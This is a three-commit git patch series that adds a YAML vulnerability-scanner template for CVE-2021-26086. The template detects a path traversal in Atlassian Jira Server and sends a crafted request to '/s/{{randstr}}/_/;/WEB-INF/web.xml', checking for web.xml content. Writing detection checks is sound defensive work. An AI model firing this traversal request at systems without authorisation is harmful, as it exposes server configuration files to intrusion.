From 7a468632dcb9e656adc83f32047dd61732b12870 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?B=C3=B9i=20=C4=90=E1=BA=A1i=20Gia?= <bdgia98@gmail.com>
Date: Thu, 26 Aug 2021 10:45:56 +0700
Subject: [PATCH 1/3] Create CVE-2021-26086.yaml

---
 cves/2021/CVE-2021-26086.yaml | 26 ++++++++++++++++++++++++++
 1 file changed, 26 insertions(+)
 create mode 100644 cves/2021/CVE-2021-26086.yaml

diff --git a/cves/2021/CVE-2021-26086.yaml b/cves/2021/CVE-2021-26086.yaml
new file mode 100644
index 0000000000..b92aada5f3
--- /dev/null
+++ b/cves/2021/CVE-2021-26086.yaml
@@ -0,0 +1,26 @@
+id: CVE-2021-26086
+
+info:
+  name: Jira Limited Remote File Read
+  author: cocxanh
+  severity: medium
+  description: Affected versions of Atlassian Jira Server and Data Center allow remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint.
+  reference: |
+    - https://jira.atlassian.com/browse/JRASERVER-72695
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-26086
+  tags: cve,cve2021,jira,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/s/xxx/_/;/WEB-INF/web.xml"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "JiraImportProgressFilter"
+        part: body

From 9ada252cdbb41a4281b9bc395b79da24f8cb9646 Mon Sep 17 00:00:00 2001
From: sandeep <sandeep@projectdiscovery.io>
Date: Thu, 26 Aug 2021 15:25:05 +0530
Subject: [PATCH 2/3] misc update

---
 cves/2021/CVE-2021-26086.yaml | 7 +++++--
 1 file changed, 5 insertions(+), 2 deletions(-)

diff --git a/cves/2021/CVE-2021-26086.yaml b/cves/2021/CVE-2021-26086.yaml
index b92aada5f3..5e33e1cde4 100644
--- a/cves/2021/CVE-2021-26086.yaml
+++ b/cves/2021/CVE-2021-26086.yaml
@@ -13,14 +13,17 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/s/xxx/_/;/WEB-INF/web.xml"
+      - "{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml"
 
     matchers-condition: and
     matchers:
       - type: status
         status:
           - 200
+
       - type: word
         words:
-          - "JiraImportProgressFilter"
+          - "<web-app"
+          - "</web-app>"
         part: body
+        condition: and

From 7a2138a8c809326e586a28e977bfb841ba28354d Mon Sep 17 00:00:00 2001
From: sandeep <sandeep@projectdiscovery.io>
Date: Thu, 26 Aug 2021 15:27:01 +0530
Subject: [PATCH 3/3] few updates

---
 cves/2021/CVE-2021-26086.yaml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/cves/2021/CVE-2021-26086.yaml b/cves/2021/CVE-2021-26086.yaml
index 5e33e1cde4..d0462007ca 100644
--- a/cves/2021/CVE-2021-26086.yaml
+++ b/cves/2021/CVE-2021-26086.yaml
@@ -1,11 +1,11 @@
 id: CVE-2021-26086
 
 info:
-  name: Jira Limited Remote File Read
+  name: Jira Limited Local File Read
   author: cocxanh
   severity: medium
   description: Affected versions of Atlassian Jira Server and Data Center allow remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint.
-  reference: |
+  reference:
     - https://jira.atlassian.com/browse/JRASERVER-72695
     - https://nvd.nist.gov/vuln/detail/CVE-2021-26086
   tags: cve,cve2021,jira,lfi